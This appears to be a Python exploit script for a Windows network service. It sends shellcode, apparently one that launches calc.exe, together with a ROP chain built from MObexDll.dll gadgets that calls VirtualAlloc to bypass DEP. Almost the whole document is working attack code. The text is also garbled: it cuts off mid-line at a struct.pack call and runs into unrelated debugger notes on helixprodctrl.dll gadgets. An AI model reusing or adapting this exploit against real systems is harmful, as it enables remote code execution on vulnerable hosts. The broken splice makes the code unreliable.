import socket import struct import binascii sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(('127.0.0.1', 8888)) shellcode="\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7" rop_gadgets = [ 0x10137a9f, # RETN [MObexDll.dll] 0x10137a9e, # POP EAX # RETN [MObexDll.dll] 0x1014c224, # ptr to &VirtualAlloc() [IAT MObexDll.dll] 0x10118176, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MObexDll.dll] 0x1000e385, # PUSH EAX # POP ESI # POP EBP # RETN [MObexDll.dll] 0x41414141, # Filler (compensate) 0x1000dea4, # POP EBP # RETN [MObexDll.dll] 0x1003e4b7, # & push esp # ret [MObexDll.dll] 0x1009e4e9, # POP EBX # RETN [MObexDll.dll] 0x00000001, # 0x00000001-> ebx 0x1012b097, # POP EDX # RETN [MObexDll.dll] 0x00001000, # 0x00001000-> edx 0x10002612, # POP ECX # RETN [MObexDll.dll] 0x00000040, # 0x00000040-> ecx 0x101242f5, # POP EDI # RETN [MObexDll.dll] 0x100d320e, # RETN (ROP NOP) [MObexDll.dll] 0x100151dc, # POP EAX # RETN [MObexDll.dll] 0x90909090, # nop 0x1000a8b6, # PUSHAD # RETN [MObexDll.dll] ] rop= ''.join(struct.pack(' 45 12 98 # 6044C074 >76981222 kernel32.GetProcAddress #6044FBEC 4B 45 52 4E KERNEL32.DLL #call to GMHA # 60432F08 |. 50 PUSH EAX # 60432F09 |. FF51 08 CALL DWORD PTR DS:[ECX+8] # 60432F0C \> C3 RETN #60451238 60451224 punteroa puntero a algo constante para que quede en EDX queda 0x60451224 # helixprodctrl.dll:60432F08 push eax # helixprodctrl.dll:60432F09 call dword ptr [ecx+8] # helixprodctrl.dll:60432F0C retn